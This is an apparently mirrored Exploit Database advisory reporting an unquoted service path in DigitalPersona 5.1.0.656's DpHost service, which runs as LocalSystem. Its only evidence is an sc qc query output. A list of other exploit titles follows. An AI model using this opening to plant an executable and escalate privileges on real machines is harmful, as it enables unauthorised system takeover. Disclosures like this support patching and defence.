DigitalPersona 5.1.0.656 ‘DpHostW’ – Unquoted Service Path

Exploit Database
17 阅读

作者： Teresa Q

日期： 2020-11-13
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/49041/

#Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path
# Discovery by: Teresa Q
# Discovery Date: 2020-11-11
# Vendor:DigitalPersonaU. are U. One Touch
# Version: 5.1.0.656
# Vulnerability Type: Unquoted Service Path
# Vendor Homepage :https://www.hidglobal.com/crossmatch
# Tested on OS: Windows 10 Home x64 es

#Analyze PoC :
==============

C:\>sc qc "DpHost"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DpHost
TIPO : 10WIN32_OWN_PROCESS
TIPO_INICIO: 2 AUTO_START
CONTROL_ERROR: 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\DigitalPersona\Bin\DpHostW.exe
GRUPO_ORDEN_CARGA: BiometricGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Servicio de autenticación biométrica
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

C:\>

last Exploits
DigitalPersona 5.1.0.656 ‘DpHostW’ – Unquoted Service Path的更多信息

K7 Computing (Multiple Products) – Arbitrary Write Privilege Escalation：
SnackAmp 3.1.3 – SMP Buffer Overflow (SEH)：
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)：
Sync Breeze Enterprise 9.5.16 – ‘Import Command’ Local Buffer Overflow：
Linux Kernel 2.6.32 (Ubuntu 10.04) – ‘/proc’ Handling SUID Privilege Escalation：
BEWARD Intercom 2.3.1 – Credentials Disclosure：
Microsoft Windows – Assembly Execution (MS12-005)：
Modbus Slave PLC 7 – ‘.msw’ Buffer Overflow (PoC)：